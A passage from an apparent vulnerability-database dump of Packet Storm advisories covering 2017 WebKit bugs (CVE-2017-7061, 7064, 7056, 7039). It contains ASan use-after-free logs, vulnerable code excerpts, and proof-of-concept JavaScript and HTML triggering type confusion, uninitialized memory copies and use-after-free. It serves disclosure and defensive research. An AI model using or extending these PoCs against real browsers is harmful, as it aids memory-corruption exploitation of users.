WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) \n#12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) \n#13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185) \n#14 0x10a6767b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2) \n#15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6) \n#16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f) \n#17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d) \n#18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2) \n#19 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273) \n#20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0) \n#21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3) \n#22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e) \n#23 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9) \n#24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c) \n#25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550) \n#26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab) \n#27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1) \n#28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f) \n#29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d) \n \npreviously allocated by thread T0 here: \n#0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) \n#1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) \n#2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) \n#3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) \n#4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) \n#5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) \n#6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08) \n#7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9) \n#8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d) \n#9 0x10a0e2c59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59) \n#10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3) \n#11 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273) \n#12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0) \n#13 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3) \n#14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e) \n#15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9) \n#16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c) \n#17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550) \n#18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab) \n#19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1) \n#20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f) \n#21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d) \n#22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041) \n#23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268) \n#24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c) \n#25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7) \n#26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1) \n#27 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93) \n#28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8) \n#29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441) \n \nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const \nShadow bytes around the buggy address: \n0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 \n0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa \n0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd \n=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa \n0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \n0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nFreed heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nContainer overflow: fc \nArray cookie: ac \nIntra object redzone: bb \nASan internal: fe \nLeft alloca redzone: ca \nRight alloca redzone: cb \n==728==ABORTING \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143489/GS20170725051037.txt"}, {"lastseen": "2017-09-12T22:51:37", "description": "", "published": "2017-09-12T00:00:00", "type": "packetstorm", "title": "WebKit JSC BytecodeGenerator::emitGetByVal Incorrect Optimization", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-09-12T00:00:00", "id": "PACKETSTORM:144092", "href": "https://packetstormsecurity.com/files/144092/WebKit-JSC-BytecodeGenerator-emitGetByVal-Incorrect-Optimization.html", "sourceData": "` WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal \n \nCVE-2017-7061 \n \n \nLet's start with JS code. \n \nlet o = {}; \nfor (let i in {xx: 0}) { \no[i]; <<-------- (a) \n} \n \nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal. \n \nHere's the code of BytecodeGenerator::emitGetByVal. \n \nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property) \n{ \nfor (size_t i = m_forInContextStack.size(); i > 0; i--) { \nForInContext& context = m_forInContextStack[i - 1].get(); \nif (context.local() != property) \ncontinue; \n \nif (!context.isValid()) \nbreak; \n \nif (context.type() == ForInContext::IndexedForInContextType) { \nproperty = static_cast<IndexedForInContext&>(context).index(); \nbreak; \n} \n \nASSERT(context.type() == ForInContext::StructureForInContextType); \nStructureForInContext& structureContext = static_cast<StructureForInContext&>(context); \nUnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname); \ninstructions().append(kill(dst)); \ninstructions().append(base->index()); \ninstructions().append(property->index()); \ninstructions().append(structureContext.index()->index()); \ninstructions().append(structureContext.enumerator()->index()); \ninstructions().append(profile); \nreturn dst; \n} \n \nUnlinkedArrayProfile arrayProfile = newArrayProfile(); \nUnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val); \ninstructions().append(kill(dst)); \ninstructions().append(base->index()); \ninstructions().append(property->index()); \ninstructions().append(arrayProfile); \ninstructions().append(profile); \nreturn dst; \n} \n \nThe method uses op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that \"i\" will be a string(\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it. \n \nHere's another example. \n \nlet o = {}; \nfor (let i in {xx: 0}) { \no[i]; <<-------- (a) \ni = 0x123456; <<-------- (b) \no[i]; <<-------- (c) \n} \n \nIn this case, it will use op_get_direct_pname at (a). And at (b), since the index variable \"i\" is replaced, the invalidate method of the ForInContext object that makes \"context.isValid()\" return false is called. So, op_get_by_val will be used at (c). \n \nBut the problem is that it can't properly handle the following case which cause a type confusion. \n \nlet o = {}; \nfor (let i in {xx: 0}) { \nfor (let j = 0; j < 2; j++) { \no[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore. \ni = 0; \n} \n} \n \nPoC: \nlet o = {}; \nfor (let i in {xx: 0}) { \nfor (let j = 0; j < 2; j++) { \no[i]; \ni = new Uint32Array([0, 1, 0x777777, 0, 0]); \n} \n} \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144092/GS20170912050307.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC JSArray::appendMemcpy Uninitialized Memory Copy", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143479", "href": "https://packetstormsecurity.com/files/143479/WebKit-JSC-JSArray-appendMemcpy-Uninitialized-Memory-Copy.html", "sourceData": "` WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nCVE-2017-7064 \n \n \nWebKit: JSC: JSArray::appendMemcpy uninitialized memory copy \n \nHere's a snippet of JSArray::appendMemcpy. \n \nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray) \n{ \nauto scope = DECLARE_THROW_SCOPE(vm); \n \nif (!canFastCopy(vm, otherArray)) \nreturn false; \n \nIndexingType type = indexingType(); \nIndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType()); \nif (type == ArrayWithUndecided && copyType != NonArray) { \nif (copyType == ArrayWithInt32) \nconvertUndecidedToInt32(vm); \nelse if (copyType == ArrayWithDouble) \nconvertUndecidedToDouble(vm); \nelse if (copyType == ArrayWithContiguous) \nconvertUndecidedToContiguous(vm); \nelse { \nASSERT(copyType == ArrayWithUndecided); \nreturn true; \n} \n} else if (type != copyType) \nreturn false; \n \n... \n \nif (type == ArrayWithDouble) \nmemcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength); \nelse \nmemcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength); \n \nreturn true; \n} \n \nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider whether |otherArray|'s type is ArrayWithUndecided that may have uninitialized data. \nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this| which has a type. \n \nPoC: \nfunction optNewArrayAndConcat() { \nlet a = [,,,,,,,,,]; \nreturn Array.prototype.concat.apply(a); \n} \n \nfunction main() { \nArray.prototype.constructor = { \n[Symbol.species]: function () { \nreturn [{}]; \n} \n}; \n \ngc(); \n \nfor (let i = 0; i < 0x10000; i++) { \noptNewArrayAndConcat().fill({}); \n} \n \ngc(); \n \nfor (let i = 0; i < 0x20000; i++) { \nlet res = optNewArrayAndConcat(); \nif (res[0]) \nprint(res.toString()); \n} \n} \n \nmain(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143479/GS20170725014549.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC ArgumentsEliminationPhase::transform Incorrect LoadVarargs Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7056"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143492", "href": "https://packetstormsecurity.com/files/143492/WebKit-JSC-ArgumentsEliminationPhase-transform-Incorrect-LoadVarargs-Handling.html", "sourceData": "` WebKit: JSC: Incorrect LoadVarargs handling in ArgumentsEliminationPhase::transform \n \nCVE-2017-7056 \n \n \nHere is a snippet of ArgumentsEliminationPhase::transform \ncase LoadVarargs: \n... \nif (candidate->op() == PhantomNewArrayWithSpread || candidate->op() == PhantomSpread) { \n... \nif (argumentCountIncludingThis <= varargsData->limit) { \nstoreArgumentCountIncludingThis(argumentCountIncludingThis); \n// store arguments \n... \n} \n \nnode->remove(); \nnode->origin.exitOK = canExit; \nbreak; \n} \n \nWhether or not the \"argumentCountIncludingThis <= varargsData->limit\" condition is satisfied, it removes the |node| variable and exits the switch statement. So in this case the condition is not satisfied, the arguments object created by the following code(CreateDirectArguments in the PoC) may have uninitialized values and length. \n \nPoC: \nconst kArgsLength = 0x101; \n \nlet buggy = null; \nfunction inlineFunc() { \nif (arguments.length != kArgsLength) { \nbuggy = arguments; \n} \n} \n \nclass ClassForInine extends inlineFunc { \n} \n \nfunction sleep(ms) { \nlet start = new Date(); \nwhile (new Date() - start < ms); \n} \n \nfunction main() { \nlet args = new Array(kArgsLength); \nargs.fill(333 + 1); \nargs = args.join(', '); \n \nlet opt = new Function(`(() => { \nnew ClassForInine(${args}); \n})();`); \n \nfor (let i = 0; i < 0x100000; i++) { \nopt(); \n \nif (i === 0x3000) \nsleep(1000); \n \nif (buggy) { \nprint('buggy.length: ' + buggy.length); \nbreak; \n} \n} \n \nfor (let i = 0, n = buggy.length; i < n; i++) { \nprint(buggy[i]); \n} \n} \n \nmain(); \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143492/GS20170725051507.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit WebCore::Node::nextSibling Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7039"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143483", "href": "https://packetstormsecurity.com/files/143483/WebKit-WebCore-Node-nextSibling-Use-After-Free.html", "sourceData": "`WebKit: use-after-free in WebCore::Node::nextSibling \n \nCVE-2017-7039 \n \n \nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. \n \nPoC: \n \n================================================================= \n \n<script> \nfunction freememory() { \nvar a; \nfor(var i=0;i<100;i++) { \na = new Uint8Array(1024*1024); \n} \n} \nfunction go() { \nmeter.textContent = \"foo\"; \nfreememory(); \n} \nfunction eventhandler() { \ntemplate.appendChild(table); \n} \n</script> \n<body onload=go()> \n<meter id=\"meter\"> \n<shadow> \n<template id=\"template\"> \n</template> \n<style onload=\"eventhandler()\"></style> \n<table id=\"table\"> \n<iframe></iframe> \n<svg> \n \n================================================================= \n \nASan log: \n \n================================================================= \n==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp 0x7fff5369a300 sp 0x7fff5369a2f8 \nREAD of size 8 at 0x60c0000b7070 thread T0 \n==29516==WARNING: invalid path to external symbolizer! \n==29516==WARNING: Failed to use and restart external symbolizer! \n#0 0x1111c843a in WebCore::Node::nextSibling() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) \n#1 0x1115649f3 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3af9f3) \n#2 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892) \n#3 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d) \n#4 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118) \n#5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f) \n#6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2) \n#7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd) \n#8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c) \n#9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d) \n#10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74) \n#11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9) \n#12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da) \n#13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9) \n#14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724) \n#15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b) \n#16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439) \n#17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, 